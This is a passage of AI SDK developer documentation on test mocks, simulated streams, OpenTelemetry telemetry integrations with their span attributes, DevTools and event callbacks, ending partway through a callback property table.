import { MockLanguageModelV4 } from 'ai/test';
import { z } from 'zod';
const result = streamText({
model: new MockLanguageModelV4({
doStream: async () => ({
stream: simulateReadableStream({
chunks: [
{ type: 'text-start', id: 'text-1' },
{ type: 'text-delta', id: 'text-1', delta: '{ ' },
{ type: 'text-delta', id: 'text-1', delta: '"content": ' },
{ type: 'text-delta', id: 'text-1', delta: `"Hello, ` },
{ type: 'text-delta', id: 'text-1', delta: `world` },
{ type: 'text-delta', id: 'text-1', delta: `!"` },
{ type: 'text-delta', id: 'text-1', delta: ' }' },
{ type: 'text-end', id: 'text-1' },
{
type: 'finish',
finishReason: { unified: 'stop', raw: undefined },
logprobs: undefined,
usage: {
inputTokens: {
total: 3,
noCache: 3,
cacheRead: undefined,
cacheWrite: undefined,
},
outputTokens: {
total: 10,
text: 10,
reasoning: undefined,
},
},
},
],
}),
}),
}),
output: Output.object({ schema: z.object({ content: z.string() }) }),
prompt: 'Hello, test!',
});
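embed
You can mock embedding calls in the same way. A sketch, assuming the v4 embedding mock mirrors the constructor shape of MockLanguageModelV4:
import { embed } from 'ai';
import { MockEmbeddingModelV4 } from 'ai/test';
const result = await embed({
  model: new MockEmbeddingModelV4({
    doEmbed: async () => ({
      embeddings: [[0.1, 0.2, 0.3]],
      usage: { tokens: 5 },
      warnings: [],
    }),
  }),
  value: 'sunny day at the beach',
});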
Simulate UI Message Stream Responses
You can also simulate UI Message Stream responses for testing, debugging, or demonstration purposes.
Here is a Next.js example:
import { simulateReadableStream } from 'ai';
export async function POST(req: Request) {
return new Response(
simulateReadableStream({
initialDelayInMs: 1000, // Delay before the first chunk
chunkDelayInMs: 300, // Delay between chunks
chunks: [
`data: {"type":"start","messageId":"msg-123"}\n\n`,
`data: {"type":"text-start","id":"text-1"}\n\n`,
`data: {"type":"text-delta","id":"text-1","delta":"This"}\n\n`,
`data: {"type":"text-delta","id":"text-1","delta":" is an"}\n\n`,
`data: {"type":"text-delta","id":"text-1","delta":" example."}\n\n`,
`data: {"type":"text-end","id":"text-1"}\n\n`,
`data: {"type":"finish"}\n\n`,
`data: [DONE]\n\n`,
],
}).pipeThrough(new TextEncoderStream()),
{
status: 200,
headers: {
'Content-Type': 'text/event-stream',
'Cache-Control': 'no-cache',
Connection: 'keep-alive',
'x-vercel-ai-ui-message-stream': 'v1',
},
},
);
}
title: Telemetry description: Using OpenTelemetry with AI SDK Core
Telemetry
The AI SDK uses OpenTelemetry to collect telemetry data. OpenTelemetry is an open-source observability framework designed to provide standardized instrumentation for collecting telemetry data.
Check out the AI SDK Observability Integrations to see providers that offer monitoring and tracing for AI SDK applications.
Enabling telemetry
Step 1: Register the OpenTelemetry integration
OpenTelemetry span collection requires the @ai-sdk/otel package. Install it and register the integration once at application startup:
pnpm add @ai-sdk/otel
import { registerTelemetryIntegration } from 'ai';
import { OpenTelemetryIntegration } from '@ai-sdk/otel';
registerTelemetryIntegration(new OpenTelemetryIntegration());
For Next.js applications, place this in your instrumentation.ts file alongside your OpenTelemetry provider setup. See the Next.js OpenTelemetry guide for more details on setting up the provider.
For Node.js applications (without Next.js), register the integration at the top level of your entry file.
Step 2: Enabling Telemetry
Once a telemetry integration is registered, all AI SDK calls emit telemetry events by default.
You can still pass telemetry to attach metadata (like functionId) or to opt out of a specific call:
const result = await generateText({
model: __MODEL__,
prompt: 'Write a short story about a cat.',
telemetry: {
functionId: `story-agent`,
},
});
By default, both inputs and outputs are recorded. You can disable them by setting the recordInputs and recordOutputs options to false.
Disabling the recording of inputs and outputs can be useful for privacy, data transfer, and performance reasons. You might for example want to disable recording inputs if they contain sensitive information.
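For example (a sketch, assuming recordInputs and recordOutputs sit on the same telemetry settings object as functionId and isEnabled):
const result = await generateText({
  model: __MODEL__,
  prompt: 'Write a short story about a cat.',
  telemetry: {
    recordInputs: false,
    recordOutputs: false,
  },
});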
Opting out
Telemetry is opt-out. To disable telemetry for a specific call, set isEnabled: false:
const result = await generateText({
model: __MODEL__,
prompt: 'Write a short story about a cat.',
telemetry: { isEnabled: false },
});
To disable telemetry globally, do not register any telemetry integrations via the registerTelemetryIntegration() function.
Telemetry Metadata
You can provide a functionId to identify the function that the telemetry data is for,
and runtimeContext to include additional information in the telemetry data.
const result = await generateText({
model: __MODEL__,
prompt: 'Write a short story about a cat.',
runtimeContext: {
something: 'custom',
someOtherThing: 'other-value',
},
telemetry: {
functionId: 'my-awesome-function',
},
});
Custom Tracer
If you want your traces to use a TracerProvider other than the one provided by the @opentelemetry/api singleton, pass a custom Tracer to the OpenTelemetryIntegration constructor:
import { registerTelemetryIntegration } from 'ai';
import { OpenTelemetryIntegration } from '@ai-sdk/otel';
import { NodeTracerProvider } from '@opentelemetry/sdk-trace-node';
const tracerProvider = new NodeTracerProvider();
registerTelemetryIntegration(
new OpenTelemetryIntegration({
tracer: tracerProvider.getTracer('ai'),
}),
);
The GenAIOpenTelemetryIntegration also accepts a custom Tracer in the same way.
Telemetry Integrations
Telemetry integrations let you hook into the generation lifecycle to build custom observability — logging, analytics, DevTools, or any other monitoring system. Instead of wiring up individual callbacks on every call, you implement a TelemetryIntegration once and register it globally or pass it via telemetry.integrations.
The GenAIOpenTelemetryIntegration and OpenTelemetryIntegration from @ai-sdk/otel are the built-in integrations for collecting OpenTelemetry spans (see Enabling telemetry above).
Registering integrations globally
Use registerTelemetryIntegration to register an integration once for all AI SDK calls:
import { registerTelemetryIntegration } from 'ai';
import { OpenTelemetryIntegration } from '@ai-sdk/otel';
registerTelemetryIntegration(new OpenTelemetryIntegration());
You can also register multiple integrations in a single call by passing them as additional arguments. They all receive the same lifecycle events:
import { registerTelemetryIntegration } from 'ai';
import { OpenTelemetryIntegration } from '@ai-sdk/otel';
import { DevToolsTelemetry } from '@ai-sdk/devtools';
registerTelemetryIntegration(
new OpenTelemetryIntegration(),
DevToolsTelemetry(),
);
Per-call integrations
You can also pass one or more integrations to individual generateText or streamText calls. When per-call integrations are provided, they replace the globally registered integrations for that call:
import { streamText } from 'ai';
import { openai } from '@ai-sdk/openai';
import { DevToolsTelemetry } from '@ai-sdk/devtools';
const result = streamText({
model: openai('gpt-4o'),
prompt: 'Hello!',
telemetry: {
integrations: [DevToolsTelemetry()],
},
});
You can combine multiple integrations — they all receive the same lifecycle events:
telemetry: {
integrations: [DevToolsTelemetry(), customLogger()],
},
Errors inside integrations are caught and do not break the generation flow.
Building a custom integration
Implement the TelemetryIntegration interface from the ai package. All methods are optional — implement only the lifecycle events you care about:
import type { TelemetryIntegration } from 'ai';
class MyIntegration implements TelemetryIntegration {
async onStart(event) {
console.log('Generation started:', event.model.modelId);
}
async onStepFinish(event) {
console.log(
`Step ${event.stepNumber} done:`,
event.usage.totalTokens,
'tokens',
);
}
async onToolExecutionEnd(event) {
if (event.success) {
console.log(
`Tool "${event.toolCall.toolName}" took ${event.durationMs}ms`,
);
} else {
console.error(`Tool "${event.toolCall.toolName}" failed:`, event.error);
}
}
async onFinish(event) {
console.log('Done. Total tokens:', event.totalUsage.totalTokens);
}
}
export function myIntegration(): TelemetryIntegration {
return new MyIntegration();
}
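You can then register it like the built-in integrations:
import { registerTelemetryIntegration } from 'ai';
registerTelemetryIntegration(myIntegration());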
Available lifecycle methods
<PropertiesTable content={[ { name: 'onStart', type: '(event: OnStartEvent) => void | PromiseLike', description: 'Called when the generation operation begins, before any LLM calls.', }, { name: 'onStepStart', type: '(event: OnStepStartEvent) => void | PromiseLike', description: 'Called when a step (LLM call) begins, before the provider is called.', }, { name: 'onToolExecutionStart', type: '(event: ToolExecutionStartEvent) => void | PromiseLike', description: "Called when a tool's execute function is about to run.", }, { name: 'onToolExecutionEnd', type: '(event: ToolExecutionEndEvent) => void | PromiseLike', description: "Called when a tool's execute function completes or errors.", }, { name: 'onStepFinish', type: '(event: OnStepFinishEvent) => void | PromiseLike', description: 'Called when a step (LLM call) completes.', }, { name: 'onFinish', type: '(event: OnFinishEvent) => void | PromiseLike', description: 'Called when the entire generation completes (all steps finished).', }, ]} />
The event types for each method are the same as the corresponding event callbacks. See the event callbacks documentation for the full property reference of each event.
Collected Data
The @ai-sdk/otel package provides two integrations that emit different span formats.
The GenAIOpenTelemetryIntegration follows the OpenTelemetry GenAI Semantic Conventions and is the recommended integration.
The OpenTelemetryIntegration emits legacy AI SDK-specific spans.
GenAI Semantic Conventions
The GenAIOpenTelemetryIntegration emits spans that follow the OpenTelemetry Semantic Conventions for GenAI.
All attributes use the gen_ai.* prefix. Provider names are mapped to well-known values (e.g. openai, anthropic, gcp.vertex_ai).
generateText / streamText
For generateText and streamText, the integration records 3 types of spans:

- invoke_agent {modelId} (root span, INTERNAL): covers the full operation including all steps and tool calls.

  Initial attributes:

  - gen_ai.operation.name: "invoke_agent"
  - gen_ai.provider.name: the provider (e.g. "openai", "anthropic")
  - gen_ai.request.model: the requested model ID
  - gen_ai.agent.name: the functionId from telemetry settings
  - gen_ai.system_instructions: system instructions formatted as a JSON array of parts (when recordInputs is enabled)
  - gen_ai.input.messages: the input messages in GenAI SemConv message format (when recordInputs is enabled)
  - gen_ai.request.temperature: the temperature setting
  - gen_ai.request.max_tokens: the maximum output tokens
  - gen_ai.request.top_p: the topP setting
  - gen_ai.request.top_k: the topK setting
  - gen_ai.request.frequency_penalty: the frequency penalty
  - gen_ai.request.presence_penalty: the presence penalty
  - gen_ai.request.stop_sequences: the stop sequences
  - gen_ai.request.seed: the seed value

  Attributes set on finish:

  - gen_ai.response.finish_reasons: array of finish reasons (e.g. ["stop"], ["tool_call"])
  - gen_ai.usage.input_tokens: the number of input tokens used
  - gen_ai.usage.output_tokens: the number of output tokens used
  - gen_ai.usage.cache_read.input_tokens: cached input tokens read
  - gen_ai.usage.cache_creation.input_tokens: cached input tokens created
  - gen_ai.output.messages: the output in GenAI SemConv message format (when recordOutputs is enabled)

- chat {modelId} (step span, CLIENT): one span per LLM provider call, nested under the root span.

  Initial attributes:

  - gen_ai.operation.name: "chat"
  - gen_ai.provider.name: the provider
  - gen_ai.request.model: the requested model ID
  - gen_ai.request.temperature, gen_ai.request.max_tokens, gen_ai.request.top_p, gen_ai.request.top_k, gen_ai.request.frequency_penalty, gen_ai.request.presence_penalty, gen_ai.request.stop_sequences: request parameters
  - gen_ai.input.messages: the prompt messages in GenAI SemConv message format (when recordInputs is enabled)
  - gen_ai.tool.definitions: the tool definitions as stringified JSON (when recordInputs is enabled)

  Attributes set on finish:

  - gen_ai.response.finish_reasons: array of finish reasons
  - gen_ai.response.id: the response ID from the provider
  - gen_ai.response.model: the model that generated the response (may differ from the requested model)
  - gen_ai.usage.input_tokens: input tokens used in this step
  - gen_ai.usage.output_tokens: output tokens used in this step
  - gen_ai.usage.cache_read.input_tokens: cached input tokens read
  - gen_ai.usage.cache_creation.input_tokens: cached input tokens created
  - gen_ai.output.messages: the output in GenAI SemConv message format (when recordOutputs is enabled)

- execute_tool {toolName} (tool span, INTERNAL): one span per tool execution, nested under the step span. See GenAI tool call spans for details.
Deprecated object APIs (generateObject / streamObject)
The deprecated object APIs emit the same span hierarchy as generateText/streamText, with one additional attribute on the root span:

- gen_ai.output.type: "json"

The step spans also include gen_ai.output.type: "json", and gen_ai.output.messages contains the generated object as a text part.
embed / embedMany
For embed and embedMany, the integration records spans with CLIENT kind:

- embeddings {modelId} (root span): covers the full embedding operation.

  Initial attributes:

  - gen_ai.operation.name: "embeddings"
  - gen_ai.provider.name: the provider
  - gen_ai.request.model: the requested model ID

  Attributes set on finish:

  - gen_ai.usage.input_tokens: the number of tokens used

- embeddings {modelId} (inner span, embedMany only): one span per provider batch call, nested under the root span.

  Initial attributes:

  - gen_ai.operation.name: "embeddings"
  - gen_ai.provider.name: the provider
  - gen_ai.request.model: the model ID

  Attributes set on finish:

  - gen_ai.usage.input_tokens: the number of tokens used
rerank
For rerank, the integration records spans with CLIENT kind:

- rerank {modelId} (root span): covers the full rerank operation.

  Initial attributes:

  - gen_ai.operation.name: "rerank"
  - gen_ai.provider.name: the provider
  - gen_ai.request.model: the requested model ID

- rerank {modelId} (inner span): one span per provider rerank call, nested under the root span.

  Initial attributes:

  - gen_ai.operation.name: "rerank"
  - gen_ai.provider.name: the provider
  - gen_ai.request.model: the model ID
GenAI span details
GenAI message format
The gen_ai.input.messages and gen_ai.output.messages attributes follow the OpenTelemetry GenAI Semantic Conventions message format.
Messages are JSON arrays of objects with a role and a parts array. Each part has a type and type-specific fields:
- text: { type: "text", content: "..." }
- reasoning: { type: "reasoning", content: "..." }
- tool_call: { type: "tool_call", id: "...", name: "...", arguments: ... }
- tool_call_response: { type: "tool_call_response", id: "...", response: ... }
- blob: { type: "blob", modality: "image"|"video"|"audio", mime_type: "...", content: "..." } (base64-encoded)
- uri: { type: "uri", modality: "image"|"video"|"audio", mime_type: "...", uri: "..." } (for URL-based files)
Output messages also include a finish_reason field (e.g. "stop", "tool_call", "length", "content_filter").
System instructions are recorded separately in gen_ai.system_instructions as a JSON array of { type: "text", content: "..." } parts.
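For illustration, a minimal exchange could be recorded roughly like this (shapes follow the conventions above; the values are made up):
// gen_ai.input.messages (JSON payload, shown as a TypeScript literal):
const inputMessages = [
  { role: 'user', parts: [{ type: 'text', content: 'What is 2 + 2?' }] },
];
// gen_ai.output.messages (output messages also carry finish_reason):
const outputMessages = [
  {
    role: 'assistant',
    parts: [{ type: 'text', content: '4' }],
    finish_reason: 'stop',
  },
];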
GenAI tool call spans
Tool call spans (execute_tool {toolName}) are nested under the step span and contain:
gen_ai.operation.name:"execute_tool"gen_ai.tool.name: the name of the toolgen_ai.tool.call.id: the tool call IDgen_ai.tool.type:"function"gen_ai.tool.call.arguments: the input arguments (stringified JSON, whenrecordInputsis enabled)gen_ai.tool.call.result: the output result (stringified JSON, whenrecordOutputsis enabled). Only set when the tool call succeeds.
Legacy AI SDK Spans (OpenTelemetryIntegration)
The OpenTelemetryIntegration emits spans using AI SDK-specific ai.* prefixed attributes.
This is the legacy format. Consider migrating to the GenAIOpenTelemetryIntegration for better compatibility with observability platforms.
generateText function
generateText records 3 types of spans:

- ai.generateText (span): the full length of the generateText call. It contains 1 or more ai.generateText.doGenerate spans. It contains the basic LLM span information and the following attributes:
  - operation.name: ai.generateText and the functionId that was set through telemetry.functionId
  - ai.operationId: "ai.generateText"
  - ai.prompt: the prompt that was used when calling generateText
  - ai.response.text: the text that was generated
  - ai.response.toolCalls: the tool calls that were made as part of the generation (stringified JSON)
  - ai.response.finishReason: the reason why the generation finished
  - ai.settings.maxOutputTokens: the maximum number of output tokens that were set

- ai.generateText.doGenerate (span): a provider doGenerate call. It can contain ai.toolCall spans. It contains the call LLM span information and the following attributes:
  - operation.name: ai.generateText.doGenerate and the functionId that was set through telemetry.functionId
  - ai.operationId: "ai.generateText.doGenerate"
  - ai.prompt.messages: the messages that were passed into the provider
  - ai.prompt.tools: array of stringified tool definitions. The tools can be of type function or provider-defined-client. Function tools have a name, description (optional), and inputSchema (JSON schema). Provider-defined-client tools have a name, id, and input (Record).
  - ai.prompt.toolChoice: the stringified tool choice setting (JSON). It has a type property (auto, none, required, tool), and if the type is tool, a toolName property with the specific tool.
  - ai.response.text: the text that was generated
  - ai.response.toolCalls: the tool calls that were made as part of the generation (stringified JSON)
  - ai.response.finishReason: the reason why the generation finished

- ai.toolCall (span): a tool call that is made as part of the generateText call. See Legacy tool call spans for more details.
streamText function
streamText records 3 types of spans and 2 types of events:

- ai.streamText (span): the full length of the streamText call. It contains an ai.streamText.doStream span. It contains the basic LLM span information and the following attributes:
  - operation.name: ai.streamText and the functionId that was set through telemetry.functionId
  - ai.operationId: "ai.streamText"
  - ai.prompt: the prompt that was used when calling streamText
  - ai.response.text: the text that was generated
  - ai.response.toolCalls: the tool calls that were made as part of the generation (stringified JSON)
  - ai.response.finishReason: the reason why the generation finished
  - ai.settings.maxOutputTokens: the maximum number of output tokens that were set

- ai.streamText.doStream (span): a provider doStream call. This span contains an ai.stream.firstChunk event and ai.toolCall spans. It contains the call LLM span information and the following attributes:
  - operation.name: ai.streamText.doStream and the functionId that was set through telemetry.functionId
  - ai.operationId: "ai.streamText.doStream"
  - ai.prompt.messages: the messages that were passed into the provider
  - ai.prompt.tools: array of stringified tool definitions. The tools can be of type function or provider-defined-client. Function tools have a name, description (optional), and inputSchema (JSON schema). Provider-defined-client tools have a name, id, and input (Record).
  - ai.prompt.toolChoice: the stringified tool choice setting (JSON). It has a type property (auto, none, required, tool), and if the type is tool, a toolName property with the specific tool.
  - ai.response.text: the text that was generated
  - ai.response.toolCalls: the tool calls that were made as part of the generation (stringified JSON)
  - ai.response.msToFirstChunk: the time it took to receive the first chunk in milliseconds
  - ai.response.msToFinish: the time it took to receive the finish part of the LLM stream in milliseconds
  - ai.response.avgCompletionTokensPerSecond: the average number of completion tokens per second
  - ai.response.finishReason: the reason why the generation finished

- ai.toolCall (span): a tool call that is made as part of the streamText call. See Legacy tool call spans for more details.

- ai.stream.firstChunk (event): an event that is emitted when the first chunk of the stream is received.
  - ai.response.msToFirstChunk: the time it took to receive the first chunk

- ai.stream.finish (event): an event that is emitted when the finish part of the LLM stream is received.
Deprecated object APIs
If you still run deprecated object APIs, you will see legacy span names:
- generateObject: ai.generateObject, ai.generateObject.doGenerate
- streamObject: ai.streamObject, ai.streamObject.doStream, ai.stream.firstChunk
Legacy object spans include the same core metadata as other LLM spans, plus
object-specific attributes such as ai.schema.*, ai.response.object, and
ai.settings.output.
embed function
embed records 2 types of spans:

- ai.embed (span): the full length of the embed call. It contains one ai.embed.doEmbed span. It contains the basic embedding span information and the following attributes:
  - operation.name: ai.embed and the functionId that was set through telemetry.functionId
  - ai.operationId: "ai.embed"
  - ai.value: the value that was passed into the embed function
  - ai.embedding: a JSON-stringified embedding

- ai.embed.doEmbed (span): a provider doEmbed call. It contains the basic embedding span information and the following attributes:
  - operation.name: ai.embed.doEmbed and the functionId that was set through telemetry.functionId
  - ai.operationId: "ai.embed.doEmbed"
  - ai.values: the values that were passed into the provider (array)
  - ai.embeddings: an array of JSON-stringified embeddings
embedMany function
embedMany records 2 types of spans:

- ai.embedMany (span): the full length of the embedMany call. It contains 1 or more ai.embedMany.doEmbed spans. It contains the basic embedding span information and the following attributes:
  - operation.name: ai.embedMany and the functionId that was set through telemetry.functionId
  - ai.operationId: "ai.embedMany"
  - ai.values: the values that were passed into the embedMany function
  - ai.embeddings: an array of JSON-stringified embeddings

- ai.embedMany.doEmbed (span): a provider doEmbed call. It contains the basic embedding span information and the following attributes:
  - operation.name: ai.embedMany.doEmbed and the functionId that was set through telemetry.functionId
  - ai.operationId: "ai.embedMany.doEmbed"
  - ai.values: the values that were sent to the provider
  - ai.embeddings: an array of JSON-stringified embeddings for each value
Legacy span details
Basic LLM span information
Many spans that use LLMs (ai.generateText, ai.generateText.doGenerate, ai.streamText, ai.streamText.doStream) contain the following attributes:
- resource.name: the functionId that was set through telemetry.functionId
- ai.model.id: the id of the model
- ai.model.provider: the provider of the model
- ai.request.headers.*: the request headers that were passed in through headers
- ai.response.providerMetadata: provider specific metadata returned with the generation response
- ai.settings.maxRetries: the maximum number of retries that were set
- ai.telemetry.functionId: the functionId that was set through telemetry.functionId
- ai.settings.runtimeContext.*: the runtime context that was passed in through the runtimeContext option
- ai.usage.completionTokens: the number of completion tokens that were used
- ai.usage.promptTokens: the number of prompt tokens that were used
Call LLM span information
Spans that correspond to individual LLM calls (ai.generateText.doGenerate, ai.streamText.doStream) contain
basic LLM span information and the following attributes:
- ai.response.model: the model that was used to generate the response. This can be different from the model that was requested if the provider supports aliases.
- ai.response.id: the id of the response. Uses the ID from the provider when available.
- ai.response.timestamp: the timestamp of the response. Uses the timestamp from the provider when available.
- Semantic Conventions for GenAI operations:
  - gen_ai.system: the provider that was used
  - gen_ai.request.model: the model that was requested
  - gen_ai.request.temperature: the temperature that was set
  - gen_ai.request.max_tokens: the maximum number of tokens that were set
  - gen_ai.request.frequency_penalty: the frequency penalty that was set
  - gen_ai.request.presence_penalty: the presence penalty that was set
  - gen_ai.request.top_k: the topK parameter value that was set
  - gen_ai.request.top_p: the topP parameter value that was set
  - gen_ai.request.stop_sequences: the stop sequences
  - gen_ai.response.finish_reasons: the finish reasons that were returned by the provider
  - gen_ai.response.model: the model that was used to generate the response. This can be different from the model that was requested if the provider supports aliases.
  - gen_ai.response.id: the id of the response. Uses the ID from the provider when available.
  - gen_ai.usage.input_tokens: the number of prompt tokens that were used
  - gen_ai.usage.output_tokens: the number of completion tokens that were used
Basic embedding span information
Many spans that use embedding models (ai.embed, ai.embed.doEmbed, ai.embedMany, ai.embedMany.doEmbed) contain the following attributes:
- ai.model.id: the id of the model
- ai.model.provider: the provider of the model
- ai.request.headers.*: the request headers that were passed in through headers
- ai.settings.maxRetries: the maximum number of retries that were set
- ai.telemetry.functionId: the functionId that was set through telemetry.functionId
- ai.settings.runtimeContext.*: the runtime context that was passed in through the runtimeContext option
- ai.usage.tokens: the number of tokens that were used
- resource.name: the functionId that was set through telemetry.functionId
Legacy tool call spans
Tool call spans (ai.toolCall) contain the following attributes:
operation.name:"ai.toolCall"ai.operationId:"ai.toolCall"ai.toolCall.name: the name of the toolai.toolCall.id: the id of the tool callai.toolCall.args: the input parameters of the tool callai.toolCall.result: the output result of the tool call. Only available if the tool call is successful and the result is serializable.
title: DevTools description: Debug and inspect AI SDK applications with DevTools
DevTools
AI SDK DevTools gives you full visibility into your AI SDK calls with generateText, streamText, and ToolLoopAgent. It helps you debug and inspect LLM requests, responses, tool calls, and multi-step interactions through a web-based UI.
DevTools is composed of two parts:
- Telemetry Integration: Captures runs and steps from your AI SDK calls via the telemetry system
- Viewer: A web UI to inspect the captured data
Installation
Install the DevTools package:
pnpm add @ai-sdk/devtools
Requirements
- AI SDK v6 beta (ai@^6.0.0-beta.0)
- Node.js compatible runtime
Using DevTools
Register the integration
Register DevToolsTelemetry globally so it captures all AI SDK calls:
import { registerTelemetryIntegration } from 'ai';
import { DevToolsTelemetry } from '@ai-sdk/devtools';
registerTelemetryIntegration(DevToolsTelemetry());
Telemetry is enabled automatically once an integration is registered — no per-call configuration is needed:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const result = await generateText({
model: openai('gpt-4o'),
prompt: 'What cities are in the United States?',
});
You can also pass the integration to individual calls instead of registering it globally:
import { streamText } from 'ai';
import { openai } from '@ai-sdk/openai';
import { DevToolsTelemetry } from '@ai-sdk/devtools';
const result = streamText({
model: openai('gpt-4o'),
prompt: 'Hello!',
telemetry: {
integrations: [DevToolsTelemetry()],
},
});
Launch the viewer
Start the DevTools viewer:
npx @ai-sdk/devtools
Open http://localhost:4983 to view your AI SDK interactions.
Monorepo usage
If you are using a monorepo setup (e.g. Turborepo, Nx), start DevTools from the same workspace where your AI SDK code runs.
For example, if your API is in apps/api, run:
cd apps/api
npx @ai-sdk/devtools
Captured data
DevTools captures the following information from your AI SDK calls:
- Input parameters and prompts: View the complete input sent to your LLM
- Output content and tool calls: Inspect generated text and tool invocations
- Token usage and timing: Monitor resource consumption and performance
- Raw provider data: Access complete request and response payloads
Runs and steps
DevTools organizes captured data into runs and steps:
- Run: A complete multi-step AI interaction, grouped by the initial prompt
- Step: A single LLM call within a run (e.g., one generateText or streamText call)
Multi-step interactions, such as those created by tool calling or agent loops, are grouped together as a single run with multiple steps. Nested sub-agent calls are linked to their parent run, making it easy to trace the full execution tree.
How it works
The DevToolsTelemetry integration hooks into the AI SDK telemetry lifecycle to capture all generateText, streamText, generateObject, and streamObject calls. Captured data is stored locally in a JSON file (.devtools/generations.json) and served through a web UI built with Hono and React.
Security considerations
DevTools stores all AI interactions locally in plain text files, including:
- User prompts and messages
- LLM responses
- Tool call arguments and results
- API request and response data
Only use DevTools in local development environments. Do not enable DevTools in production or when handling sensitive data.
title: Event Callbacks description: Subscribe to lifecycle events in generateText, streamText, embed, embedMany, and rerank calls
Event Callbacks
The AI SDK provides per-call event callbacks that you can pass to generateText, streamText, embed, embedMany, and rerank to observe lifecycle events. This is useful for building observability tools, logging systems, analytics, and debugging utilities.
Basic Usage
Pass callbacks directly to generateText, streamText, embed, embedMany, or rerank:
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-4o'),
prompt: 'What is the weather in San Francisco?',
experimental_onStart: event => {
console.log('Generation started:', event.model.modelId);
},
onFinish: event => {
console.log('Generation finished:', event.totalUsage);
},
});
Available Callbacks
generateText / streamText
<PropertiesTable content={[ { name: 'experimental_onStart', type: '(event: OnStartEvent) => void | Promise', description: 'Called when generation begins, before any LLM calls.', }, { name: 'experimental_onStepStart', type: '(event: OnStepStartEvent) => void | Promise', description: 'Called when a step (LLM call) begins, before the provider is called.', }, { name: 'experimental_onToolExecutionStart', type: '(event: ToolExecutionStartEvent) => void | Promise', description: "Called when a tool's execute function is about to run.", }, { name: 'experimental_onToolExecutionEnd', type: '(event: ToolExecutionEndEvent) => void | Promise', description: "Called when a tool's execute function completes or errors.", }, { name: 'onStepFinish', type: '(event: OnStepFinishEvent) => void | Promise', description: 'Called when a step (LLM call) completes.', }, { name: 'onFinish', type: '(event: OnFinishEvent) => void | Promise', description: 'Called when the entire generation completes (all steps finished).', }, ]} />
embed / embedMany
<PropertiesTable content={[ { name: 'experimental_onStart', type: '(event: EmbedOnStartEvent) => void | Promise', description: 'Called when the embedding operation begins, before the embedding model is called.', }, { name: 'experimental_onFinish', type: '(event: EmbedOnFinishEvent) => void | Promise', description: 'Called when the embedding operation completes, after the embedding model returns.', }, ]} />
rerank
<PropertiesTable content={[ { name: 'experimental_onStart', type: '(event: RerankOnStartEvent) => void | Promise', description: 'Called when the reranking operation begins, before the reranking model is called.', }, { name: 'experimental_onFinish', type: '(event: RerankOnFinishEvent) => void | Promise', description: 'Called when the reranking operation completes, after the reranking model returns.', }, ]} />
Event Reference
generateText / streamText
experimental_onStart
Called when the generation operation begins, before any LLM calls are made.
const result = await generateText({
model: openai('gpt-4o'),
prompt: 'Hello!',
experimental_onStart: event => {
console.log('Model:', event.model.modelId);
console.log('Temperature:', event.temperature);
},
});
<PropertiesTable
content={[
{
name: 'model',
type: '{ provider: string; modelId: string }',
description: 'The model being used for generation.',
},
{
name: 'system',
type: 'string | SystemModelMessage | Array | undefined',
description: 'The system message(s) provided to the model.',
},
{
name: 'prompt',
type: 'string | Array | undefined',
description:
'The prompt string or array of messages if using the prompt option.',
},
{
name: 'messages',
type: 'Array | undefined',
description: 'The messages array if using the messages option.',
},
{
name: 'tools',
type: 'ToolSet | undefined',
description: 'The tools available for this generation.',
},
{
name: 'toolChoice',
type: 'ToolChoice | undefined',
description: 'The tool choice strategy for this generation.',
},
{
name: 'activeTools',
type: 'Array | undefined',
description: 'Limits which tools are available for the model to call.',
},
{
name: 'maxOutputTokens',
type: 'number | undefined',
description: 'Maximum number of tokens to generate.',
},
{
name: 'temperature',
type: 'number | undefined',
description: 'Sampling temperature for generation.',
},
{
name: 'topP',
type: 'number | undefined',
description: 'Top-p (nucleus) sampling parameter.',
},
{
name: 'topK',
type: 'number | undefined',
description: 'Top-k sampling parameter.',
},
{
name: 'presencePenalty',
type: 'number | undefined',
description: 'Presence penalty for generation.',
},
{
name: 'frequencyPenalty',
type: 'number | undefined',
description: 'Frequency penalty for generation.',
},
{
name: 'stopSequences',
type: 'string[] | undefined',
description: 'Sequences that will stop generation.',
},
{
name: 'seed',
type: 'number | undefined',
description: 'Random seed for reproducible generation.',
},
{
name: 'maxRetries',
type: 'number',
description: 'Maximum number of retries for failed requests.',
},
{
name: 'timeout',
type: 'TimeoutConfiguration | undefined',
description: 'Timeout configuration for the generation.',
},
{
name: 'headers',
type: 'Record<string, string | undefined> | undefined',
description: 'Additional HTTP headers sent with the request.',
},
{
name: 'providerOptions',
type: 'ProviderOptions | undefined',
description: 'Additional provider-specific options.',
},
{
name: 'stopWhen',
type: 'StopCondition | Array | undefined',
description: 'Condition(s) for stopping the generation.',
},
{
name: 'output',
type: 'Output | undefined',
description: 'The output specification for structured outputs.',
},
{
name: 'abortSignal',
type: 'AbortSignal | undefined',
description: 'Abort signal for cancelling the operation.',
},
{
name: 'include',
type: '{ requestBody?: boolean; responseBody?: boolean } | undefined',
description:
'Settings for controlling what data is included in step results.',
},
{
name: 'functionId',
type: 'string | undefined',
description:
'Identifier from telemetry settings for grouping related operations.',
},
{
name: 'runtimeContext',
type: 'CONTEXT',
description:
'User-defined shared runtime context object that flows through the generation lifecycle.',
},
{
name: 'toolsContext',
type: 'InferToolSetContext',
description:
'Per-tool context map passed via toolsContext, keyed by tool name.',
},
]}
/>
experimental_onStepStart
Called before each step (LLM call) begins. Useful for tracking multi-step generations.
const result = await generateText({
model: openai('gpt-4o'),
prompt: 'Hello!',
experimental_onStepStart: event => {
console.log('Step:', event.stepNumber);
console.log('Messages:', event.messages.length);
},
});
<PropertiesTable content={[ { name: 'stepNumber', type: 'number', description: 'Zero-based index of the current step.', }, { name: 'model', type: '{ provider: string; modelId: string }', description: 'The model being used for this step.', }, { name: 'system', type: 'string | SystemModelMessage | Array | undefined', description: 'The system message for this step.', }, { name: 'messages', type: 'Array', description: 'The messages that will be sent to the model for this step.', }, { name: 'tools', type: 'ToolSet | undefined', description: 'The tools available for this generation.', }, { name: 'toolChoice', type: 'LanguageModelV4ToolChoice | undefined', description: 'The tool choice configuration for this step.', }, { name: 'activeTools', type: 'Array | undefined', description: 'Limits which tools are available for this step.', }, { name: 'steps', type: 'ReadonlyArray', description: 'Array of results from previous steps (empty for first step).', }, { name: 'providerOptions', type: 'ProviderOptions | undefined', description: 'Additional provider-specific options for this step.', }, { name: 'timeout', type: 'TimeoutConfiguration | undefined', description: 'Timeout configuration for the generation.', }, { name: 'headers', type: 'Record<string, string | undefined> | undefined', description: 'Additional HTTP headers sent with the request.', }, { name: 'stopWhen', type: 'StopCondition | 